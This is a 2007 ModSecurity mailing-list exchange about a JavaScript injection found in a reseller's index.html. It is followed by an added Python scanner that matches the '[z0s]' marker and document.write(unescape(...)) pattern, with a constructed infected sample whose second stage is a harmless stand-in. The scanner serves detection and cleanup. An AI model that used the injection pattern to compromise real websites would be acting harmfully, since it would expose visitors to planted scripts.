[Modsecurity] Some type of file injection vuln going around
Michael Shinn
mike at gotroot.com
Tue Oct 9 10:05:17 EDT 2007
Can you send me that index.html file? Also, if you can send me your
user's access_log, we might be able to find out the vector for the
attack.
On Mon, 2007-10-08 at 12:48 -0400, admin at efastservers.com wrote:
> One of my resellers contacted me today stating that one of his
> websites was hacked and possibly the server. He wanted to know what we
> were going to do about it.
>
> I checked the server but no other website is affected except for two
> of his own websites.
>
> There seems to be some type of javascript file injection vuln going
> around. I searched the logs but could not find anything obvious in his
> logs. I checked all sites and they are clean.
>
> Here is what was injected into his index.html file after the <header>
> tag.
>
> There is a small discussion about this at
> http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23
>
> Is there a mod_sec rule that can stop this?
>
> Thanks
>
> _______________________________________________
> Modsecurity mailing list
> Modsecurity at gotroot.com
> http://lists.gotroot.com/mailman/listinfo/modsecurity
--
Michael T. Shinn KeyID:0xDAE2EC86
Key Fingerprint: 1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86
SANS Advisory Board Member
Got Root? http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls: http://troubleshootingfirewalls.com
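An added file scanner for this injection (example code written for this page, not code from the list, from gotroot or from either poster): it looks for the `<!--[z0s]-->` comment markers and the `document.write(unescape("..."))` call the reported block uses, percent-decodes the argument to confirm it yields a second `<script>` stage, and can walk a docroot to list affected files. The marker names and call shape come from the report; the sample HTML is constructed.

```python
"""Scan web documents for the '[z0s]' document.write(unescape(...)) injection."""
import os
import re
from urllib.parse import unquote

# The injected block sits between these comment markers and starts with a
# document.write(unescape("...")) call whose argument percent-encodes a second <script>.
MARKER_RE = re.compile(r"<!--\[z0s\]-->.*?<!--\[/z0s\]-->")
WRITE_RE = re.compile(r'document\.write\(unescape\("([^"]*)"\)\)')

def find_injections(html):
    """Return one record per document.write(unescape(...)) call that decodes to a <script>.
    Whitespace is stripped first: mail wrapping splits tokens ('do\\ncument'), and a
    percent-encoded argument never contains whitespace, so nothing of it is lost."""
    compact = re.sub(r"\s+", "", html)
    spans = [(m.start(), m.end()) for m in MARKER_RE.finditer(compact)]
    hits = []
    for w in WRITE_RE.finditer(compact):
        # unquote handles %XX only; JS unescape's %uXXXX form would stay literal here.
        decoded = unquote(w.group(1))
        # Benign uses (an entity, a concatenated loader URL) do not decode to a bare <script>.
        if "<script" not in decoded.lower():
            continue
        hits.append({"in_z0s_marker": any(s <= w.start() < e for s, e in spans),
                     "decoded": decoded})
    return hits

def scan_tree(root, exts=(".html", ".htm", ".php")):
    """Walk a docroot and map each infected file path to its findings."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injections(fh.read())
            if hits:
                findings[path] = hits
    return findings

# Constructed samples: the injected block as reported (with a short stand-in for the
# long second stage) and a page with a harmless unescape() call.
SAMPLE_INFECTED = (
    "<html><head><title>home</title></head><body>hi</body>\n</html>\n"
    '<!--[z0s]--><script>do\ncument.write(unescape("%3Cscript%3Eif%28wA%21%3D1%29'
    '%7B%7Dvar%20wA%3D1%3C/script%3E"))</script><!--[/z0s]-->'
)
SAMPLE_CLEAN = '<html><body><script>document.write(unescape("Hello%20World"))</script></body></html>'
```

For the mod_sec question, the same two patterns can be matched in a phase 4 rule on RESPONSE_BODY (with SecResponseBodyAccess On), which keeps the injected stage from reaching visitors while the source files found by the scan are cleaned and the access_log is checked for the vector.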